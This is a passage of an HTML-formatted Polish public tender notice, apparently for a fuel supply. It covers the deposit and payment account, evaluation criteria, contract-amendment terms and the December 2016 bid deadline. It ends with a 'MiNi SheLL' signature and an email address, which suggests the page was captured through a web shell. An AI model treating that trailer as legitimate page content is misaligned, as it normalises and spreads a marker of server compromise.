c)	Wypełnioną i podpisaną Kalkulację cenową  Rozdział III SIWZ,
d)	Zobowiązanie do udostępnienia zasobów (w przypadku powoływania się na  zasoby podmiotu trzeciego)
e)	Dowód opłacenia wadium
f)	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność  z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda od wykonawców wniesienia wadium przed upływem terminu składania ofert w kwocie: 3.000,00 zł. W zależności od wyboru wykonawcy, wadium może być wnoszone w jednej lub kilku następujących formach :
a)	Pieniądzu
Wadium wniesione w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Banku Spółdzielczym w Kolbuszowej nr rachunku 20 9180 0008 2001 0001 7792 0001  w terminie zapewniającym jego wpływ na wskazane konto przed terminem składania ofert. Kopię dowodu wpłaty należy dołączyć do oferty. 
Za termin wniesienia wadium w pieniądzu uważa się datę uznania środków na koncie Zamawiającego.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym (oryginał);
c)	gwarancjach bankowych (oryginał);
d)	gwarancjach ubezpieczeniowych (oryginał);
e)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 tj.) (oryginał).

	Wadium wnoszone w formie gwarancji/poręczenia musi:
obejmować cały okres związania ofertą.
obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp. 

Dokument w formie gwarancji/poręczenia winien zawierać stwierdzenie, że na każde pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu następuje jego bezwarunkowa wypłata w pełnej wysokości bez jakichkolwiek zastrzeżeń. 

Gwarancja/poręczenie musi być podpisane przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta/Poręczyciela. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny 
(z podaniem imienia i nazwiska). 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Długość okresu dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa 
w następujących przypadkach:
1)	zmiana nazwy, siedziby stron umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
2)	zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy;
3)	zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
4)	w razie wystąpienia istotnych zmian okoliczności powodujących, że wykonanie umowy nie leży w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach, a także może zmniejszyć ilość nabywanego paliwa. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu zrealizowanej części umowy. Wykonawcy nie przysługuje z tego tytułu odszkodowanie, jak też żądanie zapłaty kar umownych;
5)	zmiana może dotyczyć zmiany kwoty wynagrodzenia ryczałtowego lub zmiany ceny jednostkowej określonej w ofercie przetargowej w związku ze zmianą stawki podatku VAT. Zmiana taka może być dokonana po wejściu w życie Rozporządzenia regulującego zmianę stawek VAT;

Powyższe okoliczności stanowią zakres, charakter oraz warunki wprowadzenia zmian 
w zawartej umowie o których mowa w art. 144 ust. 1 PZP.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com